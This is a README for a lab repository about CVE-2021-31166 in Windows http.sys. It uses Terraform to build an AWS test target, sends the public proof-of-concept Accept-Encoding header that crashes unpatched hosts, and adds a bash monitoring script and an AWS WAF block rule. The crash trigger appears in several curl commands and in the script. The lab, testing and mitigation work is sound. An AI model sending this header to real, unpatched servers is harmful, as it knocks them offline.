This repo builds on 0vercl0k's proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free in http.sys that Microsoft patched in May 2021. It stands up a small AWS lab so you can watch the crash on an unpatched Windows Server target, both directly and through an Application Load Balancer, and block the trigger with an AWS WAF rule.
```bash
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply -auto-approve
```
Terraform creates an EC2 instance running Windows Server Core 20H2, installs IIS, and adds the SSM permissions needed to open a PowerShell session on the instance from the AWS Console. It also creates an Application Load Balancer with the instance as its target. By default the Security Group allows HTTP only from YOUR public IP.
Grab the target addresses from the Terraform output, start a health-check loop for each in its own terminal, and then send the proof-of-concept request. The `Accept-Encoding` value is the exact one from 0vercl0k's PoC: sent directly to an unpatched instance it crashes http.sys (the direct loop starts timing out, the ALB loop starts returning 5xx until the host comes back); sent through the ALB with the WAF rule below attached, it is answered with the rule's custom 418 response instead.

```bash
# Define values from the Terraform output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

# Health-check loop through the ALB
while true; do curl -I "$ALB" --connect-timeout 1; done
# Health-check loop directly against the EC2 instance
while true; do curl -I "$EC2IP" --connect-timeout 1; done

# Trigger through the ALB (blocked once the WAF rule is attached)
curl -i "$ALB" -H "Accept-Encoding: doar-e, ftw, imo, ,"
# Trigger directly against the EC2 instance (crashes an unpatched host)
curl -i "$EC2IP" -H "Accept-Encoding: doar-e, ftw, imo, ,"
```
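The manual loops above leave you reading raw `curl -I` output to spot the moment the target changes state. The script below is an added example, not part of this repo: it takes a baseline probe, sends the PoC header once, and then polls until the target's state differs from the baseline or a time budget runs out. The state labels (`up`, `blocked_by_waf`, `backend_down`, `unreachable(...)`) and the mapping from curl exit codes and HTTP status codes to those labels are my own assumptions for this lab; the target argument is `$ALB` or `$EC2IP` from the Terraform output.

```bash
#!/usr/bin/env bash
# Added example (not from the original repo): fire the CVE-2021-31166 trigger
# once and report when the target's observable state changes.
set -u

# The exact Accept-Encoding value from 0vercl0k's proof of concept.
POC_HEADER='Accept-Encoding: doar-e, ftw, imo, ,'

# classify <curl exit code> <http status>: label one probe result.
# The code-to-label mapping is an assumption chosen for this lab; codes that
# are not named are passed through so they are not silently misread.
classify() {
  rc="$1"; status="$2"
  if [ "$rc" -ne 0 ]; then
    case "$rc" in
      7)  echo "unreachable(refused)" ;;   # nothing listening: host rebooting after a bugcheck
      28) echo "unreachable(timeout)" ;;   # host gone mid-crash, or blocked by the Security Group
      56) echo "unreachable(reset)" ;;     # connection dropped while the kernel went down
      *)  echo "curl_error($rc)" ;;
    esac
    return 0
  fi
  case "$status" in
    418)          echo "blocked_by_waf" ;;   # the WAF rule's custom response
    2??|3??|4??)  echo "up" ;;               # IIS (or the ALB itself) answered
    502|503|504)  echo "backend_down" ;;     # ALB reachable, the instance behind it is not
    *)            echo "unexpected($status)" ;;
  esac
}

# probe <target> [header]: one GET over HTTP, printed as a state label.
probe() {
  target="$1"; header="${2:-}"; rc=0
  if [ -n "$header" ]; then
    status=$(curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 --max-time 5 \
               -H "$header" "http://$target/") || rc=$?
  else
    status=$(curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 --max-time 5 \
               "http://$target/") || rc=$?
  fi
  classify "$rc" "$status"
}

# watch_target <target> <seconds>: baseline, send the trigger once, then poll
# until the state differs from the baseline or the time budget runs out.
# Returns 0 on a state change, 1 if nothing changed (patched host, or the
# request never reached http.sys).
watch_target() {
  target="$1"; budget="$2"
  baseline=$(probe "$target")
  printf '%s baseline: %s\n' "$(date -u +%H:%M:%S)" "$baseline"
  state=$(probe "$target" "$POC_HEADER")
  printf '%s trigger:  %s\n' "$(date -u +%H:%M:%S)" "$state"
  i=0
  while [ "$i" -lt "$budget" ]; do
    state=$(probe "$target")
    printf '%s poll:     %s\n' "$(date -u +%H:%M:%S)" "$state"
    if [ "$state" != "$baseline" ]; then
      return 0
    fi
    sleep 1
    i=$((i + 1))
  done
  return 1
}

# Usage: ./probe.sh "$EC2IP" 60   or   ./probe.sh "$ALB" 60
if [ "$#" -ge 2 ]; then
  watch_target "$1" "$2"
fi
```

Run it against `$EC2IP` first and expect the poll to flip from `up` to `unreachable(...)` within a few seconds; run it against `$ALB` with the WAF rule attached and expect `trigger: blocked_by_waf` followed by polls that stay `up`, since the request never reaches the instance.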
The AWS WAF (wafv2) rule used to block the trigger at the ALB. It inspects the `accept-encoding` header and, if its whole value is exactly the PoC string, blocks the request with a custom 418 response:

```json
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
```

Two things to keep in mind. `PositionalConstraint: EXACTLY` with no text transformation matches only a header whose entire value is that literal string, so this rule demonstrates WAF blocking in front of the target rather than a general mitigation for the bug; the real fix is the May 2021 patch. The `CustomResponseBodyKey` of `418` refers to a key in the web ACL's `CustomResponseBodies`, so that body has to be defined on the web ACL before the rule is accepted.